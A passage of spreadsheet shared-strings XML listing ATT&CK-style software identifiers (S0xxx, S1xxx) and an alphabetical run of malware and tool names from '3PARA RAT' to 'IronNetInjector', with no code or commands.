    <t>S0381</t>
  </si>
  <si>
    <t>S0383</t>
  </si>
  <si>
    <t>S0661</t>
  </si>
  <si>
    <t>S0193</t>
  </si>
  <si>
    <t>S0503</t>
  </si>
  <si>
    <t>S0277</t>
  </si>
  <si>
    <t>S1044</t>
  </si>
  <si>
    <t>S0410</t>
  </si>
  <si>
    <t>S0026</t>
  </si>
  <si>
    <t>S0417</t>
  </si>
  <si>
    <t>S0168</t>
  </si>
  <si>
    <t>S0666</t>
  </si>
  <si>
    <t>S0049</t>
  </si>
  <si>
    <t>S0460</t>
  </si>
  <si>
    <t>S0249</t>
  </si>
  <si>
    <t>S0597</t>
  </si>
  <si>
    <t>S0588</t>
  </si>
  <si>
    <t>S0493</t>
  </si>
  <si>
    <t>S0477</t>
  </si>
  <si>
    <t>S0531</t>
  </si>
  <si>
    <t>S0237</t>
  </si>
  <si>
    <t>S0690</t>
  </si>
  <si>
    <t>S0342</t>
  </si>
  <si>
    <t>S0632</t>
  </si>
  <si>
    <t>S0561</t>
  </si>
  <si>
    <t>S0132</t>
  </si>
  <si>
    <t>S0151</t>
  </si>
  <si>
    <t>S0037</t>
  </si>
  <si>
    <t>S0214</t>
  </si>
  <si>
    <t>S0246</t>
  </si>
  <si>
    <t>S0391</t>
  </si>
  <si>
    <t>S0061</t>
  </si>
  <si>
    <t>S0617</t>
  </si>
  <si>
    <t>S0135</t>
  </si>
  <si>
    <t>S0232</t>
  </si>
  <si>
    <t>S0376</t>
  </si>
  <si>
    <t>S0040</t>
  </si>
  <si>
    <t>S0070</t>
  </si>
  <si>
    <t>S0047</t>
  </si>
  <si>
    <t>S0499</t>
  </si>
  <si>
    <t>S0224</t>
  </si>
  <si>
    <t>S0170</t>
  </si>
  <si>
    <t>S0697</t>
  </si>
  <si>
    <t>S0698</t>
  </si>
  <si>
    <t>S1027</t>
  </si>
  <si>
    <t>S0087</t>
  </si>
  <si>
    <t>S0394</t>
  </si>
  <si>
    <t>S0009</t>
  </si>
  <si>
    <t>S0601</t>
  </si>
  <si>
    <t>S0431</t>
  </si>
  <si>
    <t>S0203</t>
  </si>
  <si>
    <t>S0398</t>
  </si>
  <si>
    <t>S0537</t>
  </si>
  <si>
    <t>S0189</t>
  </si>
  <si>
    <t>S1022</t>
  </si>
  <si>
    <t>S0483</t>
  </si>
  <si>
    <t>S0434</t>
  </si>
  <si>
    <t>S0357</t>
  </si>
  <si>
    <t>S0604</t>
  </si>
  <si>
    <t>S0259</t>
  </si>
  <si>
    <t>S0260</t>
  </si>
  <si>
    <t>S0231</t>
  </si>
  <si>
    <t>S0581</t>
  </si>
  <si>
    <t>S0015</t>
  </si>
  <si>
    <t>S0389</t>
  </si>
  <si>
    <t>S0044</t>
  </si>
  <si>
    <t>S0201</t>
  </si>
  <si>
    <t>S0648</t>
  </si>
  <si>
    <t>S0163</t>
  </si>
  <si>
    <t>S0528</t>
  </si>
  <si>
    <t>S0215</t>
  </si>
  <si>
    <t>S0271</t>
  </si>
  <si>
    <t>S0526</t>
  </si>
  <si>
    <t>S0669</t>
  </si>
  <si>
    <t>S0156</t>
  </si>
  <si>
    <t>S0356</t>
  </si>
  <si>
    <t>S0088</t>
  </si>
  <si>
    <t>S0265</t>
  </si>
  <si>
    <t>S0585</t>
  </si>
  <si>
    <t>S0487</t>
  </si>
  <si>
    <t>S1020</t>
  </si>
  <si>
    <t>S0387</t>
  </si>
  <si>
    <t>S0276</t>
  </si>
  <si>
    <t>S0607</t>
  </si>
  <si>
    <t>S0599</t>
  </si>
  <si>
    <t>S0437</t>
  </si>
  <si>
    <t>S0250</t>
  </si>
  <si>
    <t>S0641</t>
  </si>
  <si>
    <t>S0162</t>
  </si>
  <si>
    <t>S0236</t>
  </si>
  <si>
    <t>S0042</t>
  </si>
  <si>
    <t>S0349</t>
  </si>
  <si>
    <t>S0395</t>
  </si>
  <si>
    <t>S0211</t>
  </si>
  <si>
    <t>S0362</t>
  </si>
  <si>
    <t>S0513</t>
  </si>
  <si>
    <t>S0680</t>
  </si>
  <si>
    <t>S0681</t>
  </si>
  <si>
    <t>S0397</t>
  </si>
  <si>
    <t>S0372</t>
  </si>
  <si>
    <t>S0447</t>
  </si>
  <si>
    <t>S0582</t>
  </si>
  <si>
    <t>S0451</t>
  </si>
  <si>
    <t>S0121</t>
  </si>
  <si>
    <t>S0532</t>
  </si>
  <si>
    <t>S0010</t>
  </si>
  <si>
    <t>S0500</t>
  </si>
  <si>
    <t>S0443</t>
  </si>
  <si>
    <t>S0233</t>
  </si>
  <si>
    <t>S1016</t>
  </si>
  <si>
    <t>S0282</t>
  </si>
  <si>
    <t>S0409</t>
  </si>
  <si>
    <t>S0413</t>
  </si>
  <si>
    <t>S0652</t>
  </si>
  <si>
    <t>S0167</t>
  </si>
  <si>
    <t>S0449</t>
  </si>
  <si>
    <t>S0459</t>
  </si>
  <si>
    <t>S0576</t>
  </si>
  <si>
    <t>S0530</t>
  </si>
  <si>
    <t>S0455</t>
  </si>
  <si>
    <t>S0688</t>
  </si>
  <si>
    <t>S0339</t>
  </si>
  <si>
    <t>S1015</t>
  </si>
  <si>
    <t>S0179</t>
  </si>
  <si>
    <t>S0002</t>
  </si>
  <si>
    <t>S0133</t>
  </si>
  <si>
    <t>S0051</t>
  </si>
  <si>
    <t>S0280</t>
  </si>
  <si>
    <t>S0084</t>
  </si>
  <si>
    <t>S0083</t>
  </si>
  <si>
    <t>S0080</t>
  </si>
  <si>
    <t>S0079</t>
  </si>
  <si>
    <t>S0553</t>
  </si>
  <si>
    <t>S1026</t>
  </si>
  <si>
    <t>S0149</t>
  </si>
  <si>
    <t>S0284</t>
  </si>
  <si>
    <t>S1047</t>
  </si>
  <si>
    <t>S0256</t>
  </si>
  <si>
    <t>S0699</t>
  </si>
  <si>
    <t>S0590</t>
  </si>
  <si>
    <t>S0272</t>
  </si>
  <si>
    <t>S0034</t>
  </si>
  <si>
    <t>S0198</t>
  </si>
  <si>
    <t>S0353</t>
  </si>
  <si>
    <t>S0205</t>
  </si>
  <si>
    <t>S0228</t>
  </si>
  <si>
    <t>S0336</t>
  </si>
  <si>
    <t>S0637</t>
  </si>
  <si>
    <t>S0247</t>
  </si>
  <si>
    <t>S0630</t>
  </si>
  <si>
    <t>S0691</t>
  </si>
  <si>
    <t>S0210</t>
  </si>
  <si>
    <t>S0039</t>
  </si>
  <si>
    <t>S0056</t>
  </si>
  <si>
    <t>S0033</t>
  </si>
  <si>
    <t>S0457</t>
  </si>
  <si>
    <t>S0508</t>
  </si>
  <si>
    <t>S0118</t>
  </si>
  <si>
    <t>S0359</t>
  </si>
  <si>
    <t>S0368</t>
  </si>
  <si>
    <t>S0138</t>
  </si>
  <si>
    <t>S0165</t>
  </si>
  <si>
    <t>S0402</t>
  </si>
  <si>
    <t>S0352</t>
  </si>
  <si>
    <t>S0644</t>
  </si>
  <si>
    <t>S0346</t>
  </si>
  <si>
    <t>S0340</t>
  </si>
  <si>
    <t>S0439</t>
  </si>
  <si>
    <t>S0365</t>
  </si>
  <si>
    <t>S0052</t>
  </si>
  <si>
    <t>S0264</t>
  </si>
  <si>
    <t>S0229</t>
  </si>
  <si>
    <t>S0594</t>
  </si>
  <si>
    <t>S1017</t>
  </si>
  <si>
    <t>S0072</t>
  </si>
  <si>
    <t>S0598</t>
  </si>
  <si>
    <t>S0016</t>
  </si>
  <si>
    <t>S0626</t>
  </si>
  <si>
    <t>S0158</t>
  </si>
  <si>
    <t>S0254</t>
  </si>
  <si>
    <t>S0435</t>
  </si>
  <si>
    <t>S0216</t>
  </si>
  <si>
    <t>S0150</t>
  </si>
  <si>
    <t>S0145</t>
  </si>
  <si>
    <t>S0223</t>
  </si>
  <si>
    <t>S0371</t>
  </si>
  <si>
    <t>S0184</t>
  </si>
  <si>
    <t>S0613</t>
  </si>
  <si>
    <t>S0196</t>
  </si>
  <si>
    <t>S0197</t>
  </si>
  <si>
    <t>S0664</t>
  </si>
  <si>
    <t>S0208</t>
  </si>
  <si>
    <t>S0122</t>
  </si>
  <si>
    <t>S0556</t>
  </si>
  <si>
    <t>S1050</t>
  </si>
  <si>
    <t>S0683</t>
  </si>
  <si>
    <t>S0587</t>
  </si>
  <si>
    <t>S0643</t>
  </si>
  <si>
    <t>S0517</t>
  </si>
  <si>
    <t>S0048</t>
  </si>
  <si>
    <t>S0097</t>
  </si>
  <si>
    <t>S1031</t>
  </si>
  <si>
    <t>S0501</t>
  </si>
  <si>
    <t>S0124</t>
  </si>
  <si>
    <t>S0013</t>
  </si>
  <si>
    <t>S0428</t>
  </si>
  <si>
    <t>S0012</t>
  </si>
  <si>
    <t>S0518</t>
  </si>
  <si>
    <t>S0453</t>
  </si>
  <si>
    <t>S0378</t>
  </si>
  <si>
    <t>S1046</t>
  </si>
  <si>
    <t>S0177</t>
  </si>
  <si>
    <t>S0139</t>
  </si>
  <si>
    <t>S1012</t>
  </si>
  <si>
    <t>S0685</t>
  </si>
  <si>
    <t>S0441</t>
  </si>
  <si>
    <t>S0194</t>
  </si>
  <si>
    <t>S0393</t>
  </si>
  <si>
    <t>S0113</t>
  </si>
  <si>
    <t>S0654</t>
  </si>
  <si>
    <t>S0279</t>
  </si>
  <si>
    <t>S0238</t>
  </si>
  <si>
    <t>S0029</t>
  </si>
  <si>
    <t>S0078</t>
  </si>
  <si>
    <t>S0147</t>
  </si>
  <si>
    <t>S0192</t>
  </si>
  <si>
    <t>S1032</t>
  </si>
  <si>
    <t>S0583</t>
  </si>
  <si>
    <t>S0269</t>
  </si>
  <si>
    <t>S0650</t>
  </si>
  <si>
    <t>S0262</t>
  </si>
  <si>
    <t>S0686</t>
  </si>
  <si>
    <t>S0055</t>
  </si>
  <si>
    <t>S0241</t>
  </si>
  <si>
    <t>S0662</t>
  </si>
  <si>
    <t>S0495</t>
  </si>
  <si>
    <t>S0416</t>
  </si>
  <si>
    <t>S0496</t>
  </si>
  <si>
    <t>S0258</t>
  </si>
  <si>
    <t>S0003</t>
  </si>
  <si>
    <t>S0684</t>
  </si>
  <si>
    <t>S0112</t>
  </si>
  <si>
    <t>S0240</t>
  </si>
  <si>
    <t>S0148</t>
  </si>
  <si>
    <t>S0481</t>
  </si>
  <si>
    <t>S0565</t>
  </si>
  <si>
    <t>S0629</t>
  </si>
  <si>
    <t>S0458</t>
  </si>
  <si>
    <t>S0364</t>
  </si>
  <si>
    <t>S0169</t>
  </si>
  <si>
    <t>S1040</t>
  </si>
  <si>
    <t>S0172</t>
  </si>
  <si>
    <t>S0153</t>
  </si>
  <si>
    <t>S0075</t>
  </si>
  <si>
    <t>S0511</t>
  </si>
  <si>
    <t>S0019</t>
  </si>
  <si>
    <t>S0332</t>
  </si>
  <si>
    <t>S0375</t>
  </si>
  <si>
    <t>S0166</t>
  </si>
  <si>
    <t>S0592</t>
  </si>
  <si>
    <t>S0125</t>
  </si>
  <si>
    <t>S0174</t>
  </si>
  <si>
    <t>S0379</t>
  </si>
  <si>
    <t>S0433</t>
  </si>
  <si>
    <t>S0448</t>
  </si>
  <si>
    <t>S0400</t>
  </si>
  <si>
    <t>S0270</t>
  </si>
  <si>
    <t>S0090</t>
  </si>
  <si>
    <t>S0358</t>
  </si>
  <si>
    <t>S0253</t>
  </si>
  <si>
    <t>S0446</t>
  </si>
  <si>
    <t>S0085</t>
  </si>
  <si>
    <t>S0461</t>
  </si>
  <si>
    <t>S0195</t>
  </si>
  <si>
    <t>S0185</t>
  </si>
  <si>
    <t>S0450</t>
  </si>
  <si>
    <t>S0028</t>
  </si>
  <si>
    <t>S0063</t>
  </si>
  <si>
    <t>S0217</t>
  </si>
  <si>
    <t>S0692</t>
  </si>
  <si>
    <t>S0533</t>
  </si>
  <si>
    <t>S0218</t>
  </si>
  <si>
    <t>S0649</t>
  </si>
  <si>
    <t>S0159</t>
  </si>
  <si>
    <t>S0157</t>
  </si>
  <si>
    <t>S0035</t>
  </si>
  <si>
    <t>S0390</t>
  </si>
  <si>
    <t>S1037</t>
  </si>
  <si>
    <t>S1042</t>
  </si>
  <si>
    <t>S1049</t>
  </si>
  <si>
    <t>S0559</t>
  </si>
  <si>
    <t>S0562</t>
  </si>
  <si>
    <t>S0578</t>
  </si>
  <si>
    <t>S0519</t>
  </si>
  <si>
    <t>S0464</t>
  </si>
  <si>
    <t>S1018</t>
  </si>
  <si>
    <t>S0074</t>
  </si>
  <si>
    <t>S0370</t>
  </si>
  <si>
    <t>S0053</t>
  </si>
  <si>
    <t>S0345</t>
  </si>
  <si>
    <t>S0382</t>
  </si>
  <si>
    <t>S0639</t>
  </si>
  <si>
    <t>S0596</t>
  </si>
  <si>
    <t>S0140</t>
  </si>
  <si>
    <t>S1019</t>
  </si>
  <si>
    <t>S0546</t>
  </si>
  <si>
    <t>S0444</t>
  </si>
  <si>
    <t>S0445</t>
  </si>
  <si>
    <t>S0589</t>
  </si>
  <si>
    <t>S0610</t>
  </si>
  <si>
    <t>S0623</t>
  </si>
  <si>
    <t>S0007</t>
  </si>
  <si>
    <t>S0468</t>
  </si>
  <si>
    <t>S0633</t>
  </si>
  <si>
    <t>S1035</t>
  </si>
  <si>
    <t>S0226</t>
  </si>
  <si>
    <t>S0273</t>
  </si>
  <si>
    <t>S0627</t>
  </si>
  <si>
    <t>S0615</t>
  </si>
  <si>
    <t>S0516</t>
  </si>
  <si>
    <t>S0543</t>
  </si>
  <si>
    <t>S0374</t>
  </si>
  <si>
    <t>S0646</t>
  </si>
  <si>
    <t>S1030</t>
  </si>
  <si>
    <t>S0058</t>
  </si>
  <si>
    <t>S0188</t>
  </si>
  <si>
    <t>S0380</t>
  </si>
  <si>
    <t>S0142</t>
  </si>
  <si>
    <t>S1034</t>
  </si>
  <si>
    <t>S0491</t>
  </si>
  <si>
    <t>S0603</t>
  </si>
  <si>
    <t>S0018</t>
  </si>
  <si>
    <t>S0242</t>
  </si>
  <si>
    <t>S0060</t>
  </si>
  <si>
    <t>S0663</t>
  </si>
  <si>
    <t>S0096</t>
  </si>
  <si>
    <t>S0098</t>
  </si>
  <si>
    <t>S0586</t>
  </si>
  <si>
    <t>S0164</t>
  </si>
  <si>
    <t>S0560</t>
  </si>
  <si>
    <t>S0146</t>
  </si>
  <si>
    <t>S0131</t>
  </si>
  <si>
    <t>S0436</t>
  </si>
  <si>
    <t>S0199</t>
  </si>
  <si>
    <t>S0263</t>
  </si>
  <si>
    <t>S0011</t>
  </si>
  <si>
    <t>S0467</t>
  </si>
  <si>
    <t>S1011</t>
  </si>
  <si>
    <t>S0057</t>
  </si>
  <si>
    <t>S0595</t>
  </si>
  <si>
    <t>S0665</t>
  </si>
  <si>
    <t>S0668</t>
  </si>
  <si>
    <t>S0004</t>
  </si>
  <si>
    <t>S0671</t>
  </si>
  <si>
    <t>S0183</t>
  </si>
  <si>
    <t>S0678</t>
  </si>
  <si>
    <t>S0682</t>
  </si>
  <si>
    <t>S0266</t>
  </si>
  <si>
    <t>S0094</t>
  </si>
  <si>
    <t>S0001</t>
  </si>
  <si>
    <t>S0178</t>
  </si>
  <si>
    <t>S0647</t>
  </si>
  <si>
    <t>S0116</t>
  </si>
  <si>
    <t>S0333</t>
  </si>
  <si>
    <t>S0275</t>
  </si>
  <si>
    <t>S0136</t>
  </si>
  <si>
    <t>S0452</t>
  </si>
  <si>
    <t>S0221</t>
  </si>
  <si>
    <t>S0130</t>
  </si>
  <si>
    <t>S0022</t>
  </si>
  <si>
    <t>S0386</t>
  </si>
  <si>
    <t>S0442</t>
  </si>
  <si>
    <t>S0257</t>
  </si>
  <si>
    <t>S0476</t>
  </si>
  <si>
    <t>S0636</t>
  </si>
  <si>
    <t>S0207</t>
  </si>
  <si>
    <t>S0180</t>
  </si>
  <si>
    <t>S0109</t>
  </si>
  <si>
    <t>S0155</t>
  </si>
  <si>
    <t>S0219</t>
  </si>
  <si>
    <t>S0366</t>
  </si>
  <si>
    <t>S0670</t>
  </si>
  <si>
    <t>S0612</t>
  </si>
  <si>
    <t>S0579</t>
  </si>
  <si>
    <t>S0515</t>
  </si>
  <si>
    <t>S0514</t>
  </si>
  <si>
    <t>S0645</t>
  </si>
  <si>
    <t>S0689</t>
  </si>
  <si>
    <t>S0206</t>
  </si>
  <si>
    <t>S0059</t>
  </si>
  <si>
    <t>S0466</t>
  </si>
  <si>
    <t>S0005</t>
  </si>
  <si>
    <t>S0191</t>
  </si>
  <si>
    <t>S0176</t>
  </si>
  <si>
    <t>S0430</t>
  </si>
  <si>
    <t>S0141</t>
  </si>
  <si>
    <t>S0041</t>
  </si>
  <si>
    <t>S0161</t>
  </si>
  <si>
    <t>S0658</t>
  </si>
  <si>
    <t>S0117</t>
  </si>
  <si>
    <t>S0341</t>
  </si>
  <si>
    <t>S0388</t>
  </si>
  <si>
    <t>S0086</t>
  </si>
  <si>
    <t>S0251</t>
  </si>
  <si>
    <t>S0230</t>
  </si>
  <si>
    <t>S0027</t>
  </si>
  <si>
    <t>S0330</t>
  </si>
  <si>
    <t>S0672</t>
  </si>
  <si>
    <t>S0412</t>
  </si>
  <si>
    <t>S1013</t>
  </si>
  <si>
    <t>S0202</t>
  </si>
  <si>
    <t>S0110</t>
  </si>
  <si>
    <t>S0471</t>
  </si>
  <si>
    <t>S1043</t>
  </si>
  <si>
    <t>S0160</t>
  </si>
  <si>
    <t>S0106</t>
  </si>
  <si>
    <t>S0472</t>
  </si>
  <si>
    <t>S0105</t>
  </si>
  <si>
    <t>S0404</t>
  </si>
  <si>
    <t>S0095</t>
  </si>
  <si>
    <t>S0032</t>
  </si>
  <si>
    <t>S0008</t>
  </si>
  <si>
    <t>S0071</t>
  </si>
  <si>
    <t>S0068</t>
  </si>
  <si>
    <t>S0278</t>
  </si>
  <si>
    <t>S0101</t>
  </si>
  <si>
    <t>S0100</t>
  </si>
  <si>
    <t>S0283</t>
  </si>
  <si>
    <t>S1048</t>
  </si>
  <si>
    <t>S0175</t>
  </si>
  <si>
    <t>S0102</t>
  </si>
  <si>
    <t>S0108</t>
  </si>
  <si>
    <t>S0104</t>
  </si>
  <si>
    <t>S0385</t>
  </si>
  <si>
    <t>S0067</t>
  </si>
  <si>
    <t>S0006</t>
  </si>
  <si>
    <t>S0103</t>
  </si>
  <si>
    <t>S0111</t>
  </si>
  <si>
    <t>S0227</t>
  </si>
  <si>
    <t>S0225</t>
  </si>
  <si>
    <t>S0653</t>
  </si>
  <si>
    <t>S0123</t>
  </si>
  <si>
    <t>S0248</t>
  </si>
  <si>
    <t>S0350</t>
  </si>
  <si>
    <t>3PARA RAT</t>
  </si>
  <si>
    <t>4H RAT</t>
  </si>
  <si>
    <t>AADInternals</t>
  </si>
  <si>
    <t>ABK</t>
  </si>
  <si>
    <t>ADVSTORESHELL</t>
  </si>
  <si>
    <t>ASPXSpy</t>
  </si>
  <si>
    <t>Action RAT</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>Agent Tesla</t>
  </si>
  <si>
    <t>Agent.btz</t>
  </si>
  <si>
    <t>Amadey</t>
  </si>
  <si>
    <t>Anchor</t>
  </si>
  <si>
    <t>AppleJeus</t>
  </si>
  <si>
    <t>AppleSeed</t>
  </si>
  <si>
    <t>Aria-body</t>
  </si>
  <si>
    <t>Arp</t>
  </si>
  <si>
    <t>Astaroth</t>
  </si>
  <si>
    <t>Attor</t>
  </si>
  <si>
    <t>AuTo Stealer</t>
  </si>
  <si>
    <t>AuditCred</t>
  </si>
  <si>
    <t>AutoIt backdoor</t>
  </si>
  <si>
    <t>Avaddon</t>
  </si>
  <si>
    <t>Avenger</t>
  </si>
  <si>
    <t>Azorult</t>
  </si>
  <si>
    <t>BACKSPACE</t>
  </si>
  <si>
    <t>BADCALL</t>
  </si>
  <si>
    <t>BADFLICK</t>
  </si>
  <si>
    <t>BADNEWS</t>
  </si>
  <si>
    <t>BBK</t>
  </si>
  <si>
    <t>BBSRAT</t>
  </si>
  <si>
    <t>BISCUIT</t>
  </si>
  <si>
    <t>BITSAdmin</t>
  </si>
  <si>
    <t>BLACKCOFFEE</t>
  </si>
  <si>
    <t>BLINDINGCAN</t>
  </si>
  <si>
    <t>BLUELIGHT</t>
  </si>
  <si>
    <t>BONDUPDATER</t>
  </si>
  <si>
    <t>BOOSTWRITE</t>
  </si>
  <si>
    <t>BOOTRASH</t>
  </si>
  <si>
    <t>BS2005</t>
  </si>
  <si>
    <t>BUBBLEWRAP</t>
  </si>
  <si>
    <t>Babuk</t>
  </si>
  <si>
    <t>BabyShark</t>
  </si>
  <si>
    <t>BackConfig</t>
  </si>
  <si>
    <t>Backdoor.Oldrea</t>
  </si>
  <si>
    <t>Bad Rabbit</t>
  </si>
  <si>
    <t>BadPatch</t>
  </si>
  <si>
    <t>Bandook</t>
  </si>
  <si>
    <t>Bankshot</t>
  </si>
  <si>
    <t>Bazar</t>
  </si>
  <si>
    <t>BendyBear</t>
  </si>
  <si>
    <t>Bisonal</t>
  </si>
  <si>
    <t>BitPaymer</t>
  </si>
  <si>
    <t>BlackEnergy</t>
  </si>
  <si>
    <t>BlackMould</t>
  </si>
  <si>
    <t>BloodHound</t>
  </si>
  <si>
    <t>Bonadan</t>
  </si>
  <si>
    <t>BoomBox</t>
  </si>
  <si>
    <t>BoxCaon</t>
  </si>
  <si>
    <t>Brave Prince</t>
  </si>
  <si>
    <t>Briba</t>
  </si>
  <si>
    <t>Bumblebee</t>
  </si>
  <si>
    <t>Bundlore</t>
  </si>
  <si>
    <t>CALENDAR</t>
  </si>
  <si>
    <t>CARROTBALL</t>
  </si>
  <si>
    <t>CARROTBAT</t>
  </si>
  <si>
    <t>CCBkdr</t>
  </si>
  <si>
    <t>CHOPSTICK</t>
  </si>
  <si>
    <t>CORALDECK</t>
  </si>
  <si>
    <t>CORESHELL</t>
  </si>
  <si>
    <t>CSPY Downloader</t>
  </si>
  <si>
    <t>Cachedump</t>
  </si>
  <si>
    <t>CaddyWiper</t>
  </si>
  <si>
    <t>Cadelspy</t>
  </si>
  <si>
    <t>Calisto</t>
  </si>
  <si>
    <t>CallMe</t>
  </si>
  <si>
    <t>Cannon</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>Carberp</t>
  </si>
  <si>
    <t>Carbon</t>
  </si>
  <si>
    <t>Cardinal RAT</t>
  </si>
  <si>
    <t>Catchamas</t>
  </si>
  <si>
    <t>Caterpillar WebShell</t>
  </si>
  <si>
    <t>ChChes</t>
  </si>
  <si>
    <t>Chaes</t>
  </si>
  <si>
    <t>Chaos</t>
  </si>
  <si>
    <t>CharmPower</t>
  </si>
  <si>
    <t>Cherry Picker</t>
  </si>
  <si>
    <t>China Chopper</t>
  </si>
  <si>
    <t>Chinoxy</t>
  </si>
  <si>
    <t>Chrommme</t>
  </si>
  <si>
    <t>Clambling</t>
  </si>
  <si>
    <t>Clop</t>
  </si>
  <si>
    <t>CloudDuke</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>Cobian RAT</t>
  </si>
  <si>
    <t>CoinTicker</t>
  </si>
  <si>
    <t>ComRAT</t>
  </si>
  <si>
    <t>Comnie</t>
  </si>
  <si>
    <t>Conficker</t>
  </si>
  <si>
    <t>ConnectWise</t>
  </si>
  <si>
    <t>Conti</t>
  </si>
  <si>
    <t>CookieMiner</t>
  </si>
  <si>
    <t>CosmicDuke</t>
  </si>
  <si>
    <t>CostaBricks</t>
  </si>
  <si>
    <t>CozyCar</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>CreepyDrive</t>
  </si>
  <si>
    <t>CreepySnail</t>
  </si>
  <si>
    <t>Crimson</t>
  </si>
  <si>
    <t>CrossRAT</t>
  </si>
  <si>
    <t>Crutch</t>
  </si>
  <si>
    <t>Cryptoistic</t>
  </si>
  <si>
    <t>Cuba</t>
  </si>
  <si>
    <t>Cyclops Blink</t>
  </si>
  <si>
    <t>DCSrv</t>
  </si>
  <si>
    <t>DDKONG</t>
  </si>
  <si>
    <t>DEATHRANSOM</t>
  </si>
  <si>
    <t>DOGCALL</t>
  </si>
  <si>
    <t>DRATzarus</t>
  </si>
  <si>
    <t>Dacls</t>
  </si>
  <si>
    <t>DanBot</t>
  </si>
  <si>
    <t>DarkComet</t>
  </si>
  <si>
    <t>DarkWatchman</t>
  </si>
  <si>
    <t>Daserf</t>
  </si>
  <si>
    <t>DealersChoice</t>
  </si>
  <si>
    <t>Denis</t>
  </si>
  <si>
    <t>Derusbi</t>
  </si>
  <si>
    <t>Diavol</t>
  </si>
  <si>
    <t>Dipsind</t>
  </si>
  <si>
    <t>DnsSystem</t>
  </si>
  <si>
    <t>Dok</t>
  </si>
  <si>
    <t>Doki</t>
  </si>
  <si>
    <t>Donut</t>
  </si>
  <si>
    <t>DownPaper</t>
  </si>
  <si>
    <t>Downdelph</t>
  </si>
  <si>
    <t>Dridex</t>
  </si>
  <si>
    <t>DropBook</t>
  </si>
  <si>
    <t>Drovorub</t>
  </si>
  <si>
    <t>Dtrack</t>
  </si>
  <si>
    <t>Duqu</t>
  </si>
  <si>
    <t>DustySky</t>
  </si>
  <si>
    <t>Dyre</t>
  </si>
  <si>
    <t>ECCENTRICBANDWAGON</t>
  </si>
  <si>
    <t>EKANS</t>
  </si>
  <si>
    <t>ELMER</t>
  </si>
  <si>
    <t>EVILNUM</t>
  </si>
  <si>
    <t>Ebury</t>
  </si>
  <si>
    <t>Ecipekac</t>
  </si>
  <si>
    <t>Egregor</t>
  </si>
  <si>
    <t>Elise</t>
  </si>
  <si>
    <t>Emissary</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
    <t>Empire</t>
  </si>
  <si>
    <t>EnvyScout</t>
  </si>
  <si>
    <t>Epic</t>
  </si>
  <si>
    <t>EvilBunny</t>
  </si>
  <si>
    <t>EvilGrab</t>
  </si>
  <si>
    <t>Exaramel for Linux</t>
  </si>
  <si>
    <t>Exaramel for Windows</t>
  </si>
  <si>
    <t>Expand</t>
  </si>
  <si>
    <t>Explosive</t>
  </si>
  <si>
    <t>FALLCHILL</t>
  </si>
  <si>
    <t>FELIXROOT</t>
  </si>
  <si>
    <t>FIVEHANDS</t>
  </si>
  <si>
    <t>FLASHFLOOD</t>
  </si>
  <si>
    <t>FLIPSIDE</t>
  </si>
  <si>
    <t>FYAnti</t>
  </si>
  <si>
    <t>FakeM</t>
  </si>
  <si>
    <t>FatDuke</t>
  </si>
  <si>
    <t>Felismus</t>
  </si>
  <si>
    <t>Ferocious</t>
  </si>
  <si>
    <t>Fgdump</t>
  </si>
  <si>
    <t>FinFisher</t>
  </si>
  <si>
    <t>Final1stspy</t>
  </si>
  <si>
    <t>Flagpro</t>
  </si>
  <si>
    <t>Flame</t>
  </si>
  <si>
    <t>FlawedAmmyy</t>
  </si>
  <si>
    <t>FlawedGrace</t>
  </si>
  <si>
    <t>FoggyWeb</t>
  </si>
  <si>
    <t>Forfiles</t>
  </si>
  <si>
    <t>FrameworkPOS</t>
  </si>
  <si>
    <t>FruitFly</t>
  </si>
  <si>
    <t>FunnyDream</t>
  </si>
  <si>
    <t>Fysbis</t>
  </si>
  <si>
    <t>GLOOXMAIL</t>
  </si>
  <si>
    <t>GRIFFON</t>
  </si>
  <si>
    <t>Gazer</t>
  </si>
  <si>
    <t>Gelsemium</t>
  </si>
  <si>
    <t>GeminiDuke</t>
  </si>
  <si>
    <t>Get2</t>
  </si>
  <si>
    <t>Gold Dragon</t>
  </si>
  <si>
    <t>GoldFinder</t>
  </si>
  <si>
    <t>GoldMax</t>
  </si>
  <si>
    <t>GoldenSpy</t>
  </si>
  <si>
    <t>Goopy</t>
  </si>
  <si>
    <t>Grandoreiro</t>
  </si>
  <si>
    <t>GravityRAT</t>
  </si>
  <si>
    <t>Green Lambert</t>
  </si>
  <si>
    <t>GreyEnergy</t>
  </si>
  <si>
    <t>GrimAgent</t>
  </si>
  <si>
    <t>GuLoader</t>
  </si>
  <si>
    <t>H1N1</t>
  </si>
  <si>
    <t>HALFBAKED</t>
  </si>
  <si>
    <t>HAMMERTOSS</t>
  </si>
  <si>
    <t>HAPPYWORK</t>
  </si>
  <si>
    <t>HARDRAIN</t>
  </si>
  <si>
    <t>HAWKBALL</t>
  </si>
  <si>
    <t>HDoor</t>
  </si>
  <si>
    <t>HELLOKITTY</t>
  </si>
  <si>
    <t>HIDEDRV</t>
  </si>
  <si>
    <t>HOMEFRY</t>
  </si>
  <si>
    <t>HOPLIGHT</t>
  </si>
  <si>
    <t>HTRAN</t>
  </si>
  <si>
    <t>HTTPBrowser</t>
  </si>
  <si>
    <t>Hacking Team UEFI Rootkit</t>
  </si>
  <si>
    <t>Hancitor</t>
  </si>
  <si>
    <t>Havij</t>
  </si>
  <si>
    <t>Helminth</t>
  </si>
  <si>
    <t>HermeticWiper</t>
  </si>
  <si>
    <t>HermeticWizard</t>
  </si>
  <si>
    <t>Heyoka Backdoor</t>
  </si>
  <si>
    <t>Hi-Zor</t>
  </si>
  <si>
    <t>HiddenWasp</t>
  </si>
  <si>
    <t>Hikit</t>
  </si>
  <si>
    <t>Hildegard</t>
  </si>
  <si>
    <t>HotCroissant</t>
  </si>
  <si>
    <t>Hydraq</t>
  </si>
  <si>
    <t>HyperBro</t>
  </si>
  <si>
    <t>HyperStack</t>
  </si>
  <si>
    <t>ISMInjector</t>
  </si>
  <si>
    <t>IceApple</t>
  </si>
  <si>
    <t>IcedID</t>
  </si>
  <si>
    <t>Imminent Monitor</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>Industroyer</t>
  </si>
  <si>
    <t>InnaputRAT</t>
  </si>
  <si>
    <t>InvisiMole</t>
  </si>
  <si>
    <t>Invoke-PSImage</t>
  </si>
  <si>
    <t>IronNetInjector</t>
  </si>
  <si>
